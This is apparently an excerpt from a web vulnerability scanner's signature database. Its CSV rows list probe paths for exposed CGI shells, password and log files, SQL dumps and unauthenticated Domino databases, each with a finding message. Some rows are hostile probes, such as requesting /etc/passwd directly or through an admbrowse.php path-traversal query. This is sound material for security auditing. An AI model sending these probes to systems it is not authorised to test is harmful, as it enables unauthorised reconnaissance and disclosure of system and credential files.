"002001","3092","1","@CGIDIRSksh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002002","3092","1","@CGIDIRSlog-reader.cgi","GET","200","","","","","This might be interesting...","",""
"002003","3092","1","@CGIDIRSlog/","GET","200","","","","","This might be interesting...","",""
"002004","3092","1","@CGIDIRSlogin.cgi","GET","200","","","","","This might be interesting...","",""
"002005","3092","1","@CGIDIRSlogin.pl","GET","200","","","","","This might be interesting...","",""
"002006","3092","1","@CGIDIRSlogit.cgi","GET","200","","","","","This might be interesting...","",""
"002007","3092","1","@CGIDIRSlogs.pl","GET","200","","","","","This might be interesting...","",""
"002008","3092","1","@CGIDIRSlogs/","GET","200","","","","","This might be interesting...","",""
"002009","3092","1","@CGIDIRSlogs/access_log","GET","200","","","","","This might be interesting...","",""
"002010","3092","1","@CGIDIRSlogs/error_log","GET","200","","","","","This might be interesting...","",""
"002011","3092","1","@CGIDIRSlookwho.cgi","GET","200","","","","","This might be interesting...","",""
"002012","3092","1","@CGIDIRSmaillist.cgi","GET","200","","","","","This might be interesting...","",""
"002013","3092","1","@CGIDIRSmaillist.pl","GET","200","","","","","This might be interesting...","",""
"002014","3092","1","@CGIDIRSman.sh","GET","200","","","","","This might be interesting...","",""
"002015","3092","1","@CGIDIRSmeta.pl","GET","200","","","","","This might be interesting...","",""
"002016","3092","1","@CGIDIRSminimal.exe","GET","200","","","","","This might be interesting...","",""
"002017","3092","1","@CGIDIRSnlog-smb.cgi","GET","200","","","","","This might be interesting...","",""
"002018","3092","1","@CGIDIRSnlog-smb.pl","GET","200","","","","","This might be interesting...","",""
"002019","3092","1","@CGIDIRSnoshell","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002020","3092","1","@CGIDIRSnph-publish","GET","200","","","","","This might be interesting...","",""
"002021","3092","1","@CGIDIRSntitar.pl","GET","200","","","","","This might be interesting...","",""
"002022","3092","1","@CGIDIRSpass","GET","200","","","","","This could be interesting...","",""
"002023","3092","1","@CGIDIRSpasswd","GET","200","","","","","This could be interesting...","",""
"002024","3092","1","@CGIDIRSpasswd.txt","GET","200","","","","","This could be interesting...","",""
"002025","3092","1","@CGIDIRSpassword","GET","200","","","","","This could be interesting...","",""
"002026","3092","1","@CGIDIRSpost_query","GET","200","","","","","This might be interesting...","",""
"002027","3092","1","@CGIDIRSpu3.pl","GET","200","","","","","This might be interesting...","",""
"002028","3092","1","@CGIDIRSratlog.cgi","GET","200","","","","","This might be interesting...","",""
"002029","3092","1","@CGIDIRSresponder.cgi","GET","200","","","","","This might be interesting...","",""
"002030","3092","1","@CGIDIRSrguest.exe","GET","200","","","","","This might be interesting...","",""
"002031","3092","1","@CGIDIRSrksh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002032","3092","1","@CGIDIRSrsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002033","3092","1","@CGIDIRSsearch.cgi","GET","200","","","","","This might be interesting...","",""
"002034","3092","1","@CGIDIRSsearch.pl","GET","200","","","","","This might be interesting...","",""
"002035","3092","1","@CGIDIRSsession/adminlogin","GET","200","","","","","This might be interesting...","",""
"002036","3092","1","@CGIDIRSsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002037","3092","1","@CGIDIRSshow.pl","GET","200","","","","","This might be interesting...","",""
"002038","3092","1","@CGIDIRSstat/","GET","200","","","","","This might be interesting...","",""
"002039","3092","1","@CGIDIRSstats-bin-p/reports/index.html","GET","200","","","","","This might be interesting...","",""
"002040","3092","1","@CGIDIRSstats.pl","GET","200","","","","","This might be interesting...","",""
"002041","3092","1","@CGIDIRSstats.prf","GET","200","","","","","This might be interesting...","",""
"002042","3092","1","@CGIDIRSstats/","GET","200","","","","","This might be interesting...","",""
"002043","3092","1","@CGIDIRSstatsconfig","GET","200","","","","","This might be interesting...","",""
"002044","3092","1","@CGIDIRSstats_old/","GET","200","","","","","This might be interesting...","",""
"002045","3092","1","@CGIDIRSstatview.pl","GET","200","","","","","This might be interesting...","",""
"002046","3092","1","@CGIDIRSsurvey","GET","200","","","","","This might be interesting...","",""
"002047","3092","1","@CGIDIRSsurvey.cgi","GET","200","","","","","This might be interesting...","",""
"002048","3092","1","@CGIDIRStablebuild.pl","GET","200","","","","","This might be interesting...","",""
"002049","3092","1","@CGIDIRStcsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002050","3092","1","@CGIDIRStest.cgi","GET","200","","","","","This might be interesting...","",""
"002051","3092","1","@CGIDIRStest/test.cgi","GET","200","","","","","This might be interesting...","",""
"002052","3092","1","@CGIDIRStextcounter.pl","GET","200","","","","","This might be interesting...","",""
"002053","3092","1","@CGIDIRStidfinder.cgi","GET","200","","","","","This might be interesting...","",""
"002054","3092","1","@CGIDIRStigvote.cgi","GET","200","","","","","This might be interesting...","",""
"002055","3092","1","@CGIDIRStpgnrock","GET","200","","","","","This might be interesting...","",""
"002056","3092","1","@CGIDIRSultraboard.cgi","GET","200","","","","","This might be interesting...","",""
"002057","3092","1","@CGIDIRSultraboard.pl","GET","200","","","","","This might be interesting...","",""
"002058","3092","1","@CGIDIRSviewlogs.pl","GET","200","","","","","This might be interesting...","",""
"002059","3092","1","@CGIDIRSvisitor.exe","GET","200","","","","","This might be interesting...","",""
"002060","3092","1","@CGIDIRSw3-msql","GET","200","","","","","This might be interesting...","",""
"002061","3092","1","@CGIDIRSw3-sql","GET","200","","","","","This might be interesting...","",""
"002062","3092","1","@CGIDIRSwebais","GET","200","","","","","This might be interesting...","",""
"002063","3092","1","@CGIDIRSwebbbs.cgi","GET","200","","","","","This might be interesting...","",""
"002064","3092","1","@CGIDIRSwebbbs.exe","GET","200","","","","","This might be interesting...","",""
"002065","3092","1","@CGIDIRSwebutil.pl","GET","200","","","","","This might be interesting... has been seen in web logs from another CGI scanner.","",""
"002066","3092","1","@CGIDIRSwebutils.pl","GET","200","","","","","This might be interesting... has been seen in web logs from another CGI scanner.","",""
"002067","3092","1","@CGIDIRSwebwho.pl","GET","200","","","","","This might be interesting... has been seen in web logs from another CGI scanner.","",""
"002068","3092","1","@CGIDIRSwguest.exe","GET","200","","","","","This might be interesting...","",""
"002069","3092","1","@CGIDIRSwww-sql","GET","200","","","","","This might be interesting...","",""
"002070","3092","1","@CGIDIRSwwwboard.cgi.cgi","GET","200","","","","","This might be interesting...","",""
"002071","3092","1","@CGIDIRSwwwboard.pl","GET","200","","","","","This might be interesting...","",""
"002072","3092","1","@CGIDIRSwwwstats.pl","GET","200","","","","","This might be interesting...","",""
"002073","3092","1","@CGIDIRSwwwthreads/3tvars.pm","GET","200","","","","","This might be interesting...","",""
"002074","3092","1","@CGIDIRSwwwthreads/w3tvars.pm","GET","200","","","","","This might be interesting...","",""
"002075","3092","1","@CGIDIRSzsh","GET","200","","","","","This might be interesting... possibly a system shell found.","",""
"002076","13483","12","/adsamples/config/site.csc","GET","200","","","","","Contains SQL username/password","",""
"002077","3092","1","/advworks/equipment/catalog_type.asp","GET","200","","","","","This might be interesting...","",""
"002078","3092","1","/carbo.dll","GET","200","","","","","This might be interesting...","",""
"002079","17670","1","/clocktower/","GET","200","","","","","Site Server sample files.  This might be interesting...","",""
"002080","3092","1","/localstart.asp","GET","You are not authorized","","","","","This may be interesting...","",""
"002081","17670","1","/market/","GET","200","","","","","Site Server sample files.  This might be interesting.","",""
"002082","17670","1","/mspress30/","GET","200","","","","","Site Server sample files.  This might be interesting...","",""
"002083","3092","1","/sam","GET","200","","","","","This might be interesting...","",""
"002084","3092","1","/sam.bin","GET","200","","","","","This might be interesting...","",""
"002085","3092","1","/sam._","GET","200","","","Forbidden","","This might be interesting...","",""
"002086","3092","1","/samples/search/queryhit.htm","GET","200","","","","","This might be interesting...","",""
"002087","3092","1","/scripts/counter.exe","GET","200","","","","","This might be interesting...","",""
"002088","17669","76","/scripts/cphost.dll","GET","200","","","","","cphost.dll may have a DoS and a traversal issue.","",""
"002089","3092","1","/scripts/fpadmcgi.exe","GET","200","","","","","This might be interesting...","",""
"002090","3092","1","/scripts/postinfo.asp","GET","200","","","","","This might be interesting...","",""
"002091","3092","1","/scripts/samples/ctguestb.idc","GET","200","","","","","This might be interesting...","",""
"002092","3092","1","/scripts/samples/search/webhits.exe","GET","200","","","","","This might be interesting...","",""
"002093","3092","1","/site/iissamples/","GET","200","","","","","This might be interesting...","",""
"002094","17670","1","/vc30/","GET","200","","","","","Site Server sample files.  This might be interesting...","",""
"002095","3092","1","/_mem_bin/","GET","200","","","","","This might be interesting - User Login","",""
"002096","3092","1","/_mem_bin/FormsLogin.asp","GET","200","","","","","This might be interesting - User Login","",""
"002097","3092","1","/perl/files.pl","GET","200","","","","","This might be interesting...","",""
"002098","3092","1","/perl5/files.pl","GET","200","","","","","This might be interesting...","",""
"002099","3092","1","/scripts/convert.bas","GET","200","","","","","This might be interesting...","",""
"002100","3092","1","/owa_util%2esignature","GET","200","","","","","Unknown, may be interesting","",""
"002101","3233","1","/cgi-dos/args.bat","GET","200","","","","","Default FrontPage CGI found.","",""
"002102","3092","1","/custdata/","GET","200","","","","","This may be COWS (CGI Online Worldweb Shopping), and may be interesting...","",""
"002103","3092","1","/hostingcontroller/","GET","200","","","","","This might be interesting...probably HostingController, www.hostingcontroller.com","",""
"002104","3092","2","/data.sql","GET","200","","","","","Database SQL?","",""
"002105","3092","2","/databases/","GET","200","","","","","Databases? Really??","",""
"002106","3092","2","/databse.sql","GET","200","","","","","Database SQL?","",""
"002107","3092","2","/db.sql","GET","200","","","","","Database SQL?","",""
"002108","3092","2","/etc/passwd","GET","root:","","","","","An '/etc/passwd' file is available via the web site.","",""
"002109","3092","2","/img-sys/","GET","200","","","","","Default image directory should not allow directory listing.","",""
"002110","3092","2","/java-sys/","GET","200","","","","","Default Java directory should not allow directory listing.","",""
"002111","3092","2","/javadoc/","GET","200","","","","","Documentation...?","",""
"002112","3092","2","/log/","GET","200","","","","","Ahh...log information...fun!","",""
"002113","3092","2","/manager/","GET","200","","","","","May be a web server or site manager.","",""
"002114","3092","2","/manual/","GET","200","","","","","Web server manual found.","",""
"002115","3092","2","/exchange/","GET","401","","","","","This may be interesting (Outlook exchange OWA server?)...","",""
"002116","3092","3","/pls/admin","GET","ENVIRONMENT","","","","","Oracle Apache+WebDB gives a lot of system information via the pls/admin script","",""
"002117","3092","3","/account.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002118","3092","3","/accounts.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002119","3092","3","/admin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002120","3092","3","/admin4.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002121","3092","3","/admin5.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002122","3092","3","/agentrunner.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002123","3092","3","/alog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002124","3092","3","/archive/a_domlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002125","3092","3","/archive/l_domlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002126","3092","3","/a_domlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002127","3092","3","/billing.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002128","3092","3","/bookmark.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002129","3092","3","/books.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002130","3092","3","/busytime.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002131","3092","3","/calendar.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002132","3092","3","/certa.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002133","3092","3","/certlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002134","3092","3","/certsrv.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002135","3092","3","/chatlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002136","3092","3","/clbusy.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002137","3092","3","/cldbdir.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002138","3092","3","/clusta4.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002139","3092","3","/collect4.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002140","3092","3","/cpa.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002141","3092","3","/customerdata.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002142","3092","3","/da.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002143","3092","3","/database.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002144","3092","3","/db.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002145","3092","3","/dclf.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002146","3092","3","/DEASAppDesign.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002147","3092","3","/DEASLog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002148","3092","3","/DEASLog01.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002149","3092","3","/DEASLog02.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002150","3092","3","/DEASLog03.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002151","3092","3","/DEASLog04.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002152","3092","3","/DEASLog05.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002153","3092","3","/decsadm.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002154","3092","3","/decsdoc.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002155","3092","3","/decslog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002156","3092","3","/DEESAdmin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002157","3092","3","/default.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002158","3092","3","/dirassist.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002159","3092","3","/doladmin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002160","3092","3","/dols_help.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002161","3092","3","/domadmin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002162","3092","3","/domcfg.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002163","3092","3","/event.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002164","3092","3","/events.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002165","3092","3","/events5.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002166","3092","3","/group.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002167","3092","3","/groups.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002168","3092","3","/help5_admin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002169","3092","3","/help5_client.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002170","3092","3","/help5_designer.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002171","3092","3","/homepage.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002172","3092","3","/iNotes/Forms5.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002173","3092","3","/iNotes/Forms5.nsf/$DefaultNav","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002174","3092","3","/jotter.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002175","3092","3","/kbccv11.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002176","3092","3","/kbnv11.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002177","3092","3","/kbssvv11.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002178","3092","3","/lcon.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002179","3092","3","/ldap.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002180","3092","3","/leiadm.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002181","3092","3","/leilog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002182","3092","3","/leivlt.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002183","3092","3","/log4a.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002184","3092","3","/lsxlc.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002185","3092","3","/l_domlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002186","3092","3","/mab.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002187","3092","3","/mail/adminisist.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002188","3092","3","/mail1.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002189","3092","3","/mail10.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002190","3092","3","/mail2.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002191","3092","3","/mail3.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002192","3092","3","/mail4.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002193","3092","3","/mail5.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002194","3092","3","/mail6.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002195","3092","3","/mail7.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002196","3092","3","/mail8.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002197","3092","3","/mail9.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002198","3092","3","/mailw46.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002199","3092","3","/msdwda.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002200","3092","3","/mtatbls.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002201","3092","3","/mtdata/mtstore.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002202","3092","3","/mtstore.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002203","3092","3","/nntp/nd000000.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002204","3092","3","/nntp/nd000001.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002205","3092","3","/nntp/nd000002.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002206","3092","3","/nntp/nd000003.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002207","3092","3","/nntp/nd000004.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002208","3092","3","/nntppost.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002209","3092","3","/notes.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002210","3092","3","/ntsync4.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002211","3092","3","/ntsync45.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002212","3092","3","/perweb.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002213","3092","3","/private.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002214","3092","3","/public.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002215","3092","3","/qpadmin.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002216","3092","3","/quickplace/quickplace/main.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002217","3092","3","/quickstart/qstart50.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002218","3092","3","/quickstart/wwsample.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002219","3092","3","/readme.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002220","3092","3","/reports.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002221","3092","3","/sample/faqw46","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002222","3092","3","/sample/framew46","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002223","3092","3","/sample/pagesw46","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002224","3092","3","/sample/siregw46","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002225","3092","3","/sample/site1w4646","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002226","3092","3","/sample/site2w4646","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002227","3092","3","/sample/site3w4646","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002228","3092","3","/schema50.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002229","3092","3","/secret.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002230","3092","3","/setupweb.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002231","3092","3","/smbcfg.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002232","3092","3","/smconf.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002233","3092","3","/smency.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002234","3092","3","/smmsg.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002235","3092","3","/smquar.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002236","3092","3","/smsolar.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002237","3092","3","/smtime.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002238","3092","3","/smtp.box","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002239","3092","3","/smtp.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002240","3092","3","/smtpibwq.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002241","3092","3","/smtpobwq.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002242","3092","3","/smtptbls.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002243","3092","3","/smvlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002244","3092","3","/software.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002245","3092","3","/srvnam.htm","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002246","3092","3","/statmail.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002247","3092","3","/stauths.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002248","3092","3","/stautht.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002249","3092","3","/stconf.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002250","3092","3","/stconfig.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002251","3092","3","/stdnaset.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002252","3092","3","/stdomino.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002253","3092","3","/stlog.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002254","3092","3","/streg.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002255","3092","3","/stsrc.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002256","3092","3","/test.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002257","3092","3","/today.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002258","3092","3","/userreg.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002259","3092","3","/users.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002260","3092","3","/vpuserinfo.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002261","3092","3","/web.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002262","3092","3","/webuser.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002263","3092","3","/welcome.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002264","3092","3","/wksinst.nsf","GET","200","","","","","This database can be read without authentication, which may reveal sensitive information.","",""
"002265","3093","1","/finance.xls","GET","200","","","","","Finance spreadsheet?","",""
"002266","3093","1","/finances.xls","GET","200","","","","","Finance spreadsheet?","",""
"002267","3093","1","/abonnement.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002268","3093","1","/acartpath/signin.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002269","3093","1","/add_acl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002270","3093","1","/admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002271","3093","1","/admin/auth.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002272","3093","1","/admin/cfg/configscreen.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002273","3093","1","/admin/cfg/configsite.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002274","3093","1","/admin/cfg/configsql.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002275","3093","1","/admin/cfg/configtache.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002276","3093","1","/admin/cms/htmltags.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002277","3093","1","/admin/credit_card_info.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002278","3093","1","/admin/exec.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002279","3093","1","/admin/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002280","3093","1","/admin/modules/cache.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002281","3093","1","/admin/objects.inc.php4","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002282","3093","1","/admin/script.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002283","3093","1","/admin/settings.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002284","3093","1","/admin/templates/header.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002285","3093","1","/admin/upload.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002286","3093","1","/admin_t/include/aff_liste_langue.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002287","3093","1","/adv/gm001-mc/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002288","3093","1","/aff_news.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002289","3093","1","/approval/ts_app.htm","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002290","3093","1","/archive.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002291","3093","1","/archive_forum.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002292","3093","1","/ashnews.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002293","3093","1","/auth.inc.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002294","3093","1","/b2-tools/gm-2-b2.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002295","3093","1","/bandwidth/index.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002296","3093","1","/basilix.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002297","3093","1","/bigsam_guestbook.php?displayBegin=9999...9999","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
